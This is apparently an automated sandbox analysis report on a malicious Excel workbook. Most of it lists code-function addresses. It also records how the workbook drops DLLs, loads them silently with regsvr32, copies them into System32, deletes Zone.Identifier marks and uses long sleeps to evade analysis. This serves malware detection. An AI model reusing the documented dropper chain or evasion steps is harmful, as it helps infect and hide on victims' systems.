                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800126A84_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800036A84_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800154B84_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A6BC4_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CABC4_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EAC04_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C6C84_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002C2C84_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064D04_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B6D44_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800180D44_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800054D84_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F2DC4_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800202E04_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002CCE04_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800226E04_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800254E44_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800184E84_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800010E84_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180019AF04_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E8F04_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A0F84_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012EF84_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800199004_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800119044_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001F9084_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002490C4_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001890C4_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D5104_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800177104_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180003D184_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002191C4_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800163204_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001D1284_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D12C4_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800149304_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085344_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C7404_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020F444_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CD444_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023B484_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B9484_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217544_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800223584_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029F5C4_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000796C4_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001BF704_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800253744_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180007F744_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180021F7C4_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800197884_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180001B8C4_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D944_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283944_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013B944_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001479C4_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E7A04_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800087A44_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017BA84_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000EBAC4_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180012BB84_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3B84_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800171B84_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018DBC4_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800257C04_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180008BC04_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800117C44_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800141C84_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B1D44_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023DDC4_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800227E04_2_00000001800227E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F12B05_2_000007FEF74F12B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F443C5_2_000007FEF74F443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F53FB5_2_000007FEF74F53FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F4A705_2_000007FEF74F4A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F5E015_2_000007FEF74F5E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F5CAD5_2_000007FEF74F5CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F68505_2_000007FEF74F6850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_002B00005_2_002B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800264105_2_0000000180026410
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025C305_2_0000000180025C30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001D585_2_0000000180001D58
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011E5C5_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C6C85_2_000000018002C6C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C2C85_2_000000018002C2C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026F145_2_0000000180026F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800163205_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800013785_2_0000000180001378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018FE85_2_0000000180018FE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ABE85_2_000000018001ABE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800243F45_2_00000001800243F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800083F85_2_00000001800083F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800247FC5_2_00000001800247FC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DBFC5_2_000000018001DBFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001100C5_2_000000018001100C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027C285_2_0000000180027C28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002143C5_2_000000018002143C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001303C5_2_000000018001303C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A8405_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800038405_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B4445_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F0485_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AC4C5_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800100505_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800030505_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000445C5_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C85C5_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800034605_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029C6C5_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001586C5_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000406C5_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E06C5_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC705_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001447C5_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026C805_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010C845_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160885_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800028885_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017C8C5_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC8C5_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002D0985_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154B85_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011CCC5_2_0000000180011CCC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064D05_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800180D45_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800054D85_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CCE05_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800254E45_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800184E85_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800010E85_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E8F05_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A0F85_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800199005_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119045_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9085_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002490C5_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001890C5_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D5105_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180003D185_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002191C5_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D1285_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D12C5_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800149305_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085345_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD445_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B9485_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000796C5_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800105905_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D945_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091A85_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800171B85_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DBC5_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C85_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B1D45_2_000000018002B1D4
                      Source: Datei_26744565.xls, Macro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll B59F16EE5E524814316A8BE8EF54EA02F9A496267555E65EEB585E4ADE85FFEC
                      Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll 52769F52F479F16D61C449D307C7FD1FA23FAA0B5589500E0967CD7955CA93D6
                      Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll 306C6E39327DAD93262B4531BA5B95B35F4541C70B0D4A6FE5F1DC8C96C86D8C
                      Source: Datei_26744565.xls, ReversingLabs: Detection: 39%
                      Source: C:\Windows\System32\regsvr32.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MreGm\Zazriwdkuo.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AnDDvm\lwQjfM.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IvkabqgmpEJ\fEKh.dll"
                      Source: C:\Windows\System32\regsvr32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVR55EC.tmp
                      Source: classification engine, Classification label: mal100.troj.expl.evad.winXLS@17/18@4/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
                      Source: Datei_26744565.xls, OLE indicator, Workbook stream: true
                      Source: Datei_26744565.xls.0.dr, OLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exe, File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder, Window detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Datei_26744565.xls, Initial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 7_2_0000000180006951 pushad ; retf 7_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 9_2_0000000180006951 pushad ; retf 9_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exe, Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: T35PENELLOsp[1].dll.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: Jf8[1].dll.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: uxevr1.ocx.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x5ef33
                      Source: 1Cb5zOjLgWGDemz55C5[1].dll.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr3.ocx.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x64194
                      Source: uxevr2.ocx.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: 4HWP0KQI[1].dll.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x644de
                      Source: uxevr4.ocx.0.dr, Static PE information: real checksum: 0x61dc7 should be: 0x5caa2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exe, File created: C:\Windows\System32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll (copy)
                      Source: C:\Windows\System32\regsvr32.exe, File created: C:\Windows\System32\MreGm\Zazriwdkuo.dll (copy)
                      Source: C:\Windows\System32\regsvr32.exe, File created: C:\Windows\System32\IvkabqgmpEJ\fEKh.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Windows\System32\regsvr32.exe, File created: C:\Windows\System32\AnDDvm\lwQjfM.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr4.ocx

                      Boot Survival

                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\uxevr4.ocx

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\regsvr32.exe, File opened: C:\Windows\system32\RrQZitdNyvCFEhe\pDnxsvRJXW.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe, File opened: C:\Windows\system32\MreGm\Zazriwdkuo.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe, File opened: C:\Windows\system32\AnDDvm\lwQjfM.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe, File opened: C:\Windows\system32\IvkabqgmpEJ\fEKh.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe, Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe TID: 1484, Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2368, Thread sleep time: -300000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2104, Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1812, Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 324, Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1156, Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2252, Thread sleep time: -300000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 1288, Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe, Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess, graph_3-16379
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dll
                      Source: C:\Windows\System32\regsvr32.exe, API coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.6 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.7 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,8_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,10_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16381
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16530
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000007.00000002.932271979.000000000023A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
